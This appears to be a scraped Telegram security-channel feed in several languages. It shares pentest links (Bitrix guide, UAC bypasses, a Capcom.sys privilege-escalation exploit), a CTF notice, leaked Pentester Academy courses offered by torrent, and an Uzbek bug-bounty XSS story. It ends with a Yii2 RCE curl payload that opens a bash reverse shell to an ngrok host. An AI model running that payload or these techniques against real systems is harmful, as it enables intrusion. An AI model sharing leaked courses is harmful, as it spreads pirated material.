Forwarded from SecuriXy.kz
🔐 Bitrix CMS - Ultimate Pentest Guide
Подробное руководство по пентесту одной из самых популярных CMS на постсоветском пространстве 1С-Битрикс. Полезно как для red team, так и для защиты от атак.
В гайде рассмотрены:
– обходы аутентификации
– XSS и SSRF
– LFI и RCE
– уязвимости в сторонних модулях (особенно Aspro)
– методы обхода WAF
и др
🔗 Источник:
https://pentestnotes.ru/notes/bitrix_pentest_full/
📝 PS новость взята у коллеги
Подробное руководство по пентесту одной из самых популярных CMS на постсоветском пространстве 1С-Битрикс. Полезно как для red team, так и для защиты от атак.
В гайде рассмотрены:
– обходы аутентификации
– XSS и SSRF
– LFI и RCE
– уязвимости в сторонних модулях (особенно Aspro)
– методы обхода WAF
и др
🔗 Источник:
https://pentestnotes.ru/notes/bitrix_pentest_full/
📝 PS новость взята у коллеги
🔥1😁1
https://github.com/hfiref0x/UACME
The UACMe repo features a comprehensive list of UAC bypasses, which can be used from the command line.
The UACMe repo features a comprehensive list of UAC bypasses, which can be used from the command line.
GitHub
GitHub - hfiref0x/UACME: Defeating Windows User Account Control
Defeating Windows User Account Control. Contribute to hfiref0x/UACME development by creating an account on GitHub.
🔥1
https://github.com/tandasat/ExploitCapcom
This is a standalone exploit for a vulnerable feature in Capcom.sys. The feature is exposed through IOCTL and to execute an arbitrary user supplied function pointer with disabling SMEP. This exploit simply abuses the feature to perform token stealing to get the SYSTEM privileges, and then launches the command prompt with the elevated privilege.
This is a standalone exploit for a vulnerable feature in Capcom.sys. The feature is exposed through IOCTL and to execute an arbitrary user supplied function pointer with disabling SMEP. This exploit simply abuses the feature to perform token stealing to get the SYSTEM privileges, and then launches the command prompt with the elevated privilege.
GitHub
GitHub - tandasat/ExploitCapcom: This is a standalone exploit for a vulnerable feature in Capcom.sys
This is a standalone exploit for a vulnerable feature in Capcom.sys - tandasat/ExploitCapcom
🔥1
Forwarded from Cyberkent Uz (Mudofaa Admin)
‼️ Ro'yxatdan o'tish uchun ushbu nizomga va https://ctf.cyberkent.uz/about da ko'rsatilgan qoidalarga amal qilgan holda amalga oshirilishi shart. Agarda nizomda ko'rsatildan qoidalarga amal qilinmasa guruhlar ogohlantirishsiz bloklanadi natijada musobaqaga ishtirok eta olmaydilar.
🗣CTF musobaqasi 2 kun davomida etadi:
⏰ 29-may 09:00 dan 17:00 gacha
⏰ 30-may 09:00 dan 17:00 gacha davom etadi.
ℹ️ Bundan tashqari ctf musobaqasining 1-kuni ya'ni 29-may kuni 1-qism bo'lib o'tadi.
Hamda musobaqaning 2-kuni ya'ni 30-may kuni 2-qism bo'lib o'tadi.
🗣CTF musobaqasi 2 kun davomida etadi:
⏰ 29-may 09:00 dan 17:00 gacha
⏰ 30-may 09:00 dan 17:00 gacha davom etadi.
ℹ️ Bundan tashqari ctf musobaqasining 1-kuni ya'ni 29-may kuni 1-qism bo'lib o'tadi.
Hamda musobaqaning 2-kuni ya'ni 30-may kuni 2-qism bo'lib o'tadi.
Forwarded from Proxy Bar
👍1🔥1
Forwarded from white2hack 📚
Pentester Academy All courses (Leaked)
Prepare for real-world scenarios with immersive, hands-on labs to solidify technical knowledge
Pentester Academy is now Skill Dive, a secure, risk-free environment to put into practice what you’ve learned from traditional training. Expanded focus areas include: networking, cybersecurity, and cloud
⛳️ Main page
👀 Official catalog
❗️Downloads via torrent
#education #pentest
Prepare for real-world scenarios with immersive, hands-on labs to solidify technical knowledge
Pentester Academy is now Skill Dive, a secure, risk-free environment to put into practice what you’ve learned from traditional training. Expanded focus areas include: networking, cybersecurity, and cloud
⛳️ Main page
👀 Official catalog
❗️Downloads via torrent
#education #pentest
🔥1
Forwarded from Sploitus Agency
Qanday qilib contact form dan zaiflik topib 1200$ oldim :
saytga kirgan paytim ariza jo'natish qismini topdim bu men uchun qiziq tuyildi sababi siz o'z rezyumeyingizni yuklashingiz mumkin edi shunday qilib men html nii yukladim uni qanday ishlaganligini tepada aytganman response da esa fileni joylashuvi keldi kirdim va ishladi endi qiziqroq qilishga harakat qildim reportda chiroyliroq turishi uchun :) va htmlni o'sha directorydagi index.htmlga yukladim tadamm directoryga kirsa 403 o'rniga meni XSS li html fileim chiqardi shunday qilib menga 1200$ berishdi
o'zi contact formlarda qanday zaifliklar bo'ladi men kuzatgan juda ko'p holatlarda Blind Stored XSS lar ko'p uchrardi undan tashqari u qismlarda no rate limit yoki api requestlar orqali sizga javob berishi kerak bo'lgan hodimning logini emaillari ko'rinadi shunday holatlar bo'lsa siz eng kamida 300$ boshlangan bountylarga ega bo'lasiz undan tashqari agar ular smtp yoki telegram botga ulangan bo'lsa siz credentiallarni jslar ichida osonlikcha topasiz agar bunday zaiflik chiqsa siz o'rtacha 1000$+ bounty ga ega bo'lasiz rostan ham bu o'ta xavfli holatlarni keltirib chiqaradi eng kamida esa tashkilot obro'sini to'kadi rostiyamda botga start bosganda so'kib tursa yaxshimasku to'g'rimi :) admin panellarga asosan kamroq e'tibor berishadi rostan ham admin panelga hech kim kirolmaydiku tog'rimi :)
mendagi yana bir qiziq holat admin panelda request jo'natish uchun admin paneldan bearer qo'yib qo'yishgandi super adminniki edi shu bilan admin panelda user ochib kirib olsayam bo'ladi siz bearer bilan api ni enum qilasiz va methodlarni aniqlaysiz endpointlarni admin paneldagi app.js dan yoki main.js dan topasiz agar yo'q bolsa brute foyda beradi umuman olganda bearer bor bolsa va uni privi yuqori bo'lsa siz ortacha 2000$ olasiz aynan shu usullar bilan siz contact formlarni tekshirsangiz ko'p holatlarda kamida bittasi uchraydi foydalaning !
saytga kirgan paytim ariza jo'natish qismini topdim bu men uchun qiziq tuyildi sababi siz o'z rezyumeyingizni yuklashingiz mumkin edi shunday qilib men html nii yukladim uni qanday ishlaganligini tepada aytganman response da esa fileni joylashuvi keldi kirdim va ishladi endi qiziqroq qilishga harakat qildim reportda chiroyliroq turishi uchun :) va htmlni o'sha directorydagi index.htmlga yukladim tadamm directoryga kirsa 403 o'rniga meni XSS li html fileim chiqardi shunday qilib menga 1200$ berishdi
o'zi contact formlarda qanday zaifliklar bo'ladi men kuzatgan juda ko'p holatlarda Blind Stored XSS lar ko'p uchrardi undan tashqari u qismlarda no rate limit yoki api requestlar orqali sizga javob berishi kerak bo'lgan hodimning logini emaillari ko'rinadi shunday holatlar bo'lsa siz eng kamida 300$ boshlangan bountylarga ega bo'lasiz undan tashqari agar ular smtp yoki telegram botga ulangan bo'lsa siz credentiallarni jslar ichida osonlikcha topasiz agar bunday zaiflik chiqsa siz o'rtacha 1000$+ bounty ga ega bo'lasiz rostan ham bu o'ta xavfli holatlarni keltirib chiqaradi eng kamida esa tashkilot obro'sini to'kadi rostiyamda botga start bosganda so'kib tursa yaxshimasku to'g'rimi :) admin panellarga asosan kamroq e'tibor berishadi rostan ham admin panelga hech kim kirolmaydiku tog'rimi :)
mendagi yana bir qiziq holat admin panelda request jo'natish uchun admin paneldan bearer qo'yib qo'yishgandi super adminniki edi shu bilan admin panelda user ochib kirib olsayam bo'ladi siz bearer bilan api ni enum qilasiz va methodlarni aniqlaysiz endpointlarni admin paneldagi app.js dan yoki main.js dan topasiz agar yo'q bolsa brute foyda beradi umuman olganda bearer bor bolsa va uni privi yuqori bo'lsa siz ortacha 2000$ olasiz aynan shu usullar bilan siz contact formlarni tekshirsangiz ko'p holatlarda kamida bittasi uchraydi foydalaning !
🔥1
CVE-2024–58136 — RCE PoC
*
Yii2 Framework
*
Yii2 Framework
curl -k -X POST https://sub.domain.tld/index.php \
-H "Content-Type: application/json" \
-d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'
🔥2😱2
Forwarded from Brut Security 2.0
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-55550 POC
🔥1